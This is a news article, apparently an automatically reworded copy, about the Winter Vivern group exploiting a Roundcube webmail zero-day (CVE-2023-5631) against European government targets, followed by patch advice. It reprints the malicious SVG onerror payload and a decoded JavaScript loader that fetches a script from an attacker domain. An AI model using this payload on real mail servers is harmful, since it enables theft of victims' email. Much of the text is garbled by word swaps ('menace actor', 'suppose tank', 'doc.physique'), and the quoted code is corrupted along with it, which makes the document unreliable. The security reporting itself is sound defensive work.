New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After studying the technical particulars about this zero-day that focused governmental entities and a suppose tank in Europe and studying concerning the Winter Vivern menace actor, get tips about mitigating this cybersecurity assault.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage menace actor generally known as Winter Vivern, whose pursuits align with Russia and Belarus. The assault targeted on exploiting a zero-day vulnerability in Roundcube webmail, with the end result being the power to checklist folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity firm ESET famous the marketing campaign has focused governmental entities and a suppose tank in Europe. This cyberattack is now not lively.

Leap to:

Technical particulars about this cyberattack exploiting a 0day in Roundcube

The menace actor begins the assault by sending a specifically crafted e-mail message with the topic line “Get began in your Outlook” and coming from “staff.administration@outlook(.)com” (Determine A).

Determine A

figure A ESET Roundcube.
Malicious e-mail message despatched by Winter Vivern to its targets. Picture: ESET

On the finish of the e-mail, a SVG tag comprises a base64-encoded malicious payload; that is hidden for the person however current within the HTML supply code. As soon as decoded, the malicious content material is:

<svg id="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" xmlns="http://www.w3.org/2000/svg"> <picture href="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The aim of the malicious code is to set off the onerror attribute through the use of an invalid URL within the x parameter.

Decoding the payload within the onerror attribute leads to a line of JavaScript code that can be executed within the sufferer’s browser within the context of the person’s Roundcube session:

var fe=doc.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
doc.physique.appendChild(fe);

The JavaScript injection labored on absolutely patched Roundcube situations on the time of Faou’s discovery. The researcher may set up that this zero-day vulnerability was positioned within the server-side script rcube_washtml.php, which did not ” … correctly sanitize the malicious SVG doc earlier than being added to the HTML web page interpreted by a Roundcube person,” as said by Faou.

The vulnerability doesn’t want any interplay with the person apart from viewing the message in an internet browser, which perhaps explains why the menace actor didn’t want to make use of a really sophisticated social engineering method; any content material considered triggers the exploit.

After this preliminary execution of JavaScript code, a second-stage loader, additionally developed in JavaScript and named checkupdate.js, is being executed and triggers the ultimate stage, as soon as once more written in JavaScript (Determine B).

Determine B

Figure B ESET Roundcube.
A part of the ultimate JavaScript payload that exfiltrates emails from the sufferer. Picture: ESET

The ultimate payload offers the aptitude for the attacker to checklist all folders and emails within the present Roundcube e-mail account along with exfiltrate e-mail messages to a command and management server through HTTP requests.

When TechRepublic requested Faou about additional compromise of the system, he replied through a written message: “We haven’t noticed any lateral motion. The JavaScript code is barely executed within the context of (the) sufferer’s browser, within the Roundcube window. So it doesn’t have entry to the backend of Roundcube and escaping the browser would require a far more sophisticated exploit. Nonetheless, they may re-use their entry to launch additional phishing campaigns originating from the sender who was compromised (we haven’t noticed this).”

Who’s Winter Vivern?

Winter Vivern, aka TA473, is a cyberespionage menace actor whose interests are closely aligned with the governments of Russia and Belarus. The first public exposure of the Winter Vivern threat actor occurred in 2021 when it focused a number of governmental entities in numerous international locations together with Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.

This menace actor has a history of exploiting webmail software program, because it already abused older Roundcube vulnerabilities and identified Zimbra webmail vulnerabilities to focus on elected officers and staffers within the U.S. in addition to specialists in European politics and economics. The menace actor additionally focused mailboxes from NATO-aligned authorities entities in Europe.

The menace actor typically makes use of malicious paperwork and typically a PowerShell backdoor to efficiently compromise its targets. Winter Vivern makes use of vulnerability scanners resembling Acunetix in all probability to scan focused networks.

ESET famous that Winter Vivern has been noticed exploiting CVE-2020-35730, which is a identified Roundcube vulnerability towards entities which are additionally focused by menace actor APT28, which has been described because the military unit 26165 of Russia’s Army Intelligence Company, beforehand generally known as GRU.

As well as, ESET identified a doable hyperlink to menace actor MoustachedBouncer, who runs assaults towards overseas diplomats in Belarus. Requested about it, Faou advised TechRepublic that “there are fairly distinctive similarities within the community infrastructure of each teams, suggesting {that a} frequent entity may present it to each of them.”

As said by ESET, concerning the present menace, “Regardless of the low sophistication of the group’s toolset, it’s a menace to governments in Europe due to its persistence, very common working of phishing campaigns, and since a major variety of internet-facing functions aren’t recurrently up to date though they’re identified to comprise vulnerabilities.”

Methods to shield customers from this cybersecurity menace

ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and launched safety updates to handle the vulnerability on Oct. 16, 2023 for variations 1.6.4, 1.4.15 and 1.5.5. It’s strongly suggested to patch Roundcube for this vulnerability.

It’s really helpful to maintain all working programs and software program updated and patched to keep away from additional compromise that would occur through frequent vulnerabilities.

Disabling JavaScript execution within the browser would mitigate this menace, but it could vastly cut back the person’s expertise as a result of a number of web sites closely depend on JavaScript to operate.

Disclosure: I work for Pattern Micro, however the views expressed on this article are mine.



Source link